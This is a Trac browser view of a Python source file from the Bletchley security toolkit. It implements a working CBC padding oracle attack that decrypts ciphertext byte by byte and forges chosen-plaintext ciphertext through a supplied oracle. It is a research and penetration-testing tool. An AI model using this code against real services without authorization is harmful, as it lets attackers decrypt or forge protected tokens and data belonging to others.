source: trunk/lib/bletchley/CBC/__init__.py

Last change on this file was 119, checked in by tim, 8 years ago

comments

File size: 17.0 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012-2015 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not caller thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance. POA objects can execute tasks internally using
40    multiple threads, however.
41
42    """
43
44    ## private
45    _thread_result = None
46    _oracle = None
47    _ciphertext = None
48    _iv = None
49
50    ## protected (reading ok, changing not ok)
51    block_size = None
52
53    ## public (r/w ok)
54    retries = 2
55    decrypted = None
56    threads = None
57    log_fh = None
58   
59    def __init__(self, oracle, block_size, ciphertext, iv=None,
60                 threads=1, decrypted=b'', log_file=None):
61        """Creates a new padding oracle attack (POA) object.
62
63        Arguments:
64        oracle -- A function which returns True if the given ciphertext
65         results in a correct padding upon decryption and False
66         otherwise.  This function should implement the prototype:
67           def myOracle(ciphertext, iv): ...
68         If the initialization vector (iv) is unknown or not included in
69         the ciphertext message, it can be ignored in your oracle
70         implementation (though some limitations will result from this).
71
72        block_size -- The block size of the ciphertext being attacked.
73         Is almost always 8 or 16.
74
75        ciphertext -- The ciphertext to be decrypted
76
77        iv -- The initialization vector associated with the ciphertext.
78         If none provided, it is assumed to be a block of 0's
79
80        threads -- The maximum number of parallel threads to use during
81         decryption.  If more than one thread is used, then the oracle
82         function will be called in parallel.  It should implement any
83         internal locking necessary to prevent race conditions where
84         applicable.
85
86        decrypted -- If a portion of the plaintext is already known (due
87         to a prior, partially successful decryption attempt), then this
88         may be used to restart the decryption process where it was
89         previously left off.  This argument is assumed to contain the
90         final N bytes (for an N-byte argument) of the plaintext; that
91         is, the tail of the plaintext including the pad.
92
93        log_file -- A Python file object where log messages will be
94         written.
95
96        """
97
98        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
99            raise InvalidBlockError(block_size,len(ciphertext))
100        if(iv != None and len(iv)%block_size != 0):
101            raise InvalidBlockError(block_size,len(iv))
102        if len(decrypted) > len(ciphertext):
103            raise Exception #XXX: custom exception
104       
105        self.block_size = block_size
106        self.decrypted = decrypted
107        self.threads = threads
108        self.log_fh = log_file
109
110        self._oracle = oracle
111        self._ciphertext = ciphertext
112        if iv == None:
113            self._iv = b'\x00'*self.block_size
114        else:
115            self._iv = iv
116
117
118    def log_message(self, s):
119        if self.log_fh != None:
120            self.log_fh.write('BLETCHLEY: %s\n' % s)
121
122
123    def probe_padding(self):
124        """Attempts to verify that a CBC padding oracle exists and then determines the
125        pad value. 
126
127        Returns the pad string, or None on failure.
128        XXX: Currently only works for PKCS 5/7.
129        """
130
131        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
132        final = blocks[-1]
133        if len(blocks) == 1:
134            # If only one block present, then try to use IV as prior
135            prior = self._iv
136        else:
137            prior = blocks[-2]
138
139        ret_val = None
140        # First probe for beginning of pad
141        for i in range(0-self.block_size,0):
142            if i == -1:
143                break
144            tweaked = prior[i] ^ 0xFF
145            tweaked = struct.pack("B", tweaked)
146            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final, self._iv):
147                break
148
149        pad_length = 0-i
150        self.log_message("Testing suspected pad length: %d" % pad_length)
151        if pad_length > 1:
152            # XXX: If this test case fails, we should try instead
153            # lengthening the pad by one byte with all 256 values (as is
154            # done in the 1-byte pad case).
155            #
156            # Verify suspected pad length by changing last pad byte to 1
157            # and making sure the padding succeeds
158            tweaked = prior[-1] ^ (pad_length^1)
159            tweaked = struct.pack("B", tweaked)
160
161            #XXX: This replaces the pad bytes with spaces.  The hope is
162            #     that any UTF-8 decoding errors that the pad bytes
163            #     might generate are addressed this way.  It is not yet
164            #     well tested.  An option should be added to allow other
165            #     bytes to be used or to turn off the behavior.
166            prior = bytearray(prior)
167            for q in range(0-self.block_size,-1):
168                prior[q] = prior[q]^(pad_length^32) # space
169
170            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final, self._iv):
171                ret_val = buffertools.pkcs7Pad(pad_length)
172
173        else:
174            # Verify by changing pad byte to 2 and brute-force changing
175            # second-to-last byte to 2 as well
176            tweaked = prior[-1] ^ (2^1)
177            tweaked = struct.pack("B", tweaked)
178            for j in range(1,256):
179                guess = prior[-2] ^ j
180                guess = struct.pack("B", guess)
181                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final, self._iv):
182                    # XXX: Save the decrypted byte for later
183                    ret_val = buffertools.pkcs7Pad(pad_length)
184
185        return ret_val
186
187
188    # XXX: This could be generalized as a byte probe utility for a variety of attacks
189    def _test_value_set(self, prefix, suffix, value_set):
190        for b in value_set:
191            if self._thread_result != None:
192                # Stop if another thread found the result
193                break
194            if self._oracle(prefix+struct.pack("B",b)+suffix, self._iv):
195                self._thread_result = b
196                break
197
198
199    def decrypt_next_byte(self, prior, block, known_bytes, cache=True):
200        """Decrypts one byte of ciphertext by modifying the prior
201        ciphertext block at the same relative offset.
202
203        Arguments:
204        prior -- Ciphertext block appearing prior to the current target
205        block -- Currently targeted ciphertext block
206        known_bytes -- Bytes in this block already decrypted
207
208        """
209
210        # XXX: If the second-to-last byte of a block happens to be 0x02
211        #      then changing the final byte to either 0x01 or 0x02 would
212        #      cause no error to be generated by the oracle.  Need to
213        #      handle that corner case.  This doesn't occur on any other
214        #      offset, since we'll have already set the previously
215        #      decrypted bytes to a specific pad value, eliminating the
216        #      ambiguity.
217
218        if(len(block)!=self.block_size):
219            raise InvalidBlockError
220        numKnownBytes = len(known_bytes)
221       
222        if(numKnownBytes >= self.block_size):
223            return known_bytes
224       
225        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
226        base = prior[self.block_size-numKnownBytes-1]
227        # Adjust known bytes to appear as a PKCS 7 pad
228        suffix = [0]*numKnownBytes
229        for i in range(0,numKnownBytes):
230            suffix[i] ^= prior[0-numKnownBytes+i]^known_bytes[i]^(numKnownBytes+1)
231        suffix = struct.pack("B"*len(suffix),*suffix)+block
232
233        # XXX: catch any signal exceptions, such as ^C, and communicate
234        #      this back to the rest of the script so it can end immediately
235        for x in range(0, 1+self.retries):
236            # Each thread spawned searches a subset of the next byte's
237            # 256 possible values
238            self._thread_result = None
239            threads = []
240            for i in range(0,self.threads):
241                t = threading.Thread(target=self._test_value_set, 
242                                     args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
243                t.start()
244                threads.append(t)
245               
246            for t in threads:
247                t.join()
248               
249            # If a byte fails to decrypt, it could be because the prior
250            # block's decrypted value violates UTF-8 decoding rules, or
251            # because it randomly introduced a delimiter that causes
252            # problems.  If retries are enabled, we insert an additional
253            # random block before the prior block so that the decrypted
254            # value can be changed.
255            if self._thread_result == None:
256                if x < self.retries:
257                    self.log_message("Value of a byte could not be determined. Retrying...")
258                    # XXX: Instead of adding a new random block to the
259                    #      beginning every time, would be better to just keep
260                    #      randomizing the same block before the original
261                    #      prior_prefix.
262                    prior_prefix = bytes([random.getrandbits(8) for i in range(self.block_size)]) + prior_prefix
263            else:
264                break
265
266        if self._thread_result == None:
267            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
268            raise Exception #XXX: custom exception
269       
270        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
271        if cache:
272            self.decrypted = decrypted + self.decrypted
273        #  Return previous bytes together with current byte
274        return decrypted+known_bytes
275   
276
277    def decrypt_block(self, prior, block, last_bytes=b'', cache=True):
278        """Decrypts the block of ciphertext provided as a parameter.
279
280        """
281
282        while(len(last_bytes)!=self.block_size):
283            last_bytes = self.decrypt_next_byte(prior, block, last_bytes, cache)
284
285        self.log_message("Decrypted block: %s" % repr(last_bytes))
286        return last_bytes
287
288
289    def decrypt(self):
290        """Decrypts the previously supplied ciphertext. If the IV was
291        not provided, it assumes a IV of zero bytes.
292
293        """
294
295        if len(self.decrypted) == 0:
296            # First decrypt the padding (quick to decrypt and good sanity check)
297            pad_bytes = self.probe_padding()
298            if pad_bytes == None:
299                # XXX: custom exception
300                self.log_message("Could not determine pad length")
301                raise Exception
302           
303            self.decrypted = pad_bytes
304
305
306        # Start where we left off last, whether that be with just a pad,
307        # or with additional decrypted blocks.
308
309        # number of bytes in any partially decrypted blocks
310        num_partial = len(self.decrypted) % self.block_size
311
312        # number of blocks fully decrypted
313        finished_blocks = len(self.decrypted) // self.block_size
314
315        # contents of the partial block
316        partial = self.decrypted[0:num_partial]
317
318        # contents of fully decrypted blocks
319        decrypted = self.decrypted[num_partial:]
320       
321        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
322
323        # Start with the partially decrypted block at the end, and work
324        # our way to the front.  Don't decrypt the very first block of
325        # the ciphertext yet.
326        for i in range(len(blocks)-1-finished_blocks, 0, -1):
327            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
328            partial = b''
329               
330        # Finally decrypt first block
331        if finished_blocks < len(blocks):
332            decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted
333       
334        # Remove the padding and return
335        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)
336
337
338    def encrypt_block(self, plaintext, ciphertext):
339        """Encrypts a block of plaintext.  This is accomplished by
340        decrypting the supplied ciphertext and then computing the prior
341        block needed to create the desired plaintext at the ciphertext's
342        location.
343
344        Returns the calculated prior block and the provided ciphertext
345        block as a tuple.
346
347        """
348        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
349            raise InvalidBlockError(self.block_size,len(plaintext))
350
351        ptext = self.decrypt_block(b'\x00'*self.block_size, ciphertext, cache=False)
352        prior = buffertools.xorBuffers(ptext, plaintext)
353        self.log_message("Encrypted block: %s to %s with prior %s" % (repr(plaintext),
354                                                                      repr(bytes(ciphertext)),
355                                                                      repr(bytes(prior))))
356        return prior,ciphertext
357   
358   
359    def encrypt(self, plaintext, ciphertext=None):
360        """Encrypts a plaintext value through "CBC-R" style prior-block
361        propagation.
362       
363        Returns a tuple of the IV and ciphertext. 
364
365        NOTE: If your target messages do not include an IV with the
366        ciphertext, you can instead opt to encrypt a suffix of the
367        message and include the IV in the the middle of the ciphertext as
368        if it were an encrypted block. This one block alone will decrypt
369        to an uncontrollable random value, but with careful placement,
370        this might be ok.
371
372        """
373       
374        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
375                                         self.block_size)
376        if ciphertext not in (None, b''):
377            if len(ciphertext) % self.block_size != 0:
378                raise InvalidBlockError(self.block_size,len(ciphertext))
379
380            cblocks = buffertools.splitBuffer(ciphertext, self.block_size)
381            prior = cblocks[0]
382
383            # remove first block from ciphertext since it'll be re-added later
384            # after the prior is converted to finished ciphertext.
385            del cblocks[0]
386            ciphertext = b''.join(cblocks)
387
388            # now remove the plaintext blocks we've already completed
389            num_finished = len(cblocks)
390            del blocks[len(blocks)-num_finished:]
391            self.log_message("Reusing previous decryption of final %d blocks" % num_finished)
392           
393        elif (len(self.decrypted) >= self.block_size
394            and len(self._ciphertext) >= 2*self.block_size):
395           
396            self.log_message("Reusing previous decryption of final block")
397
398            # If possible, reuse work from prior decryption efforts on original
399            # message for last block
400            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
401            final_plaintext = self.decrypted[0-self.block_size:]
402            prior = buffertools.xorBuffers(old_prior,
403                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
404            ciphertext = self._ciphertext[0-self.block_size:]
405            del blocks[-1]
406        else:
407            self.log_message("Starting decryption from scratch with random final block")
408           
409            # Otherwise, select a random last block and generate the prior block
410            prior = struct.pack("B"*self.block_size, 
411                                     *[random.getrandbits(8) for i in range(self.block_size)])
412            ciphertext = b''
413
414        self.log_message("Encrypting %d blocks..." % len(blocks))
415        try:
416            # Continue generating all prior blocks
417            for i in range(len(blocks)-1, -1, -1):
418                prior,cblock = self.encrypt_block(blocks[i],prior)
419                ciphertext = cblock+ciphertext
420        except Exception as e:
421            self.log_message("Encryption failure. prior+ciphertext: %s" % repr(prior+ciphertext))
422
423        # prior as IV
424        return prior,ciphertext
Note: See TracBrowser for help on using the repository browser.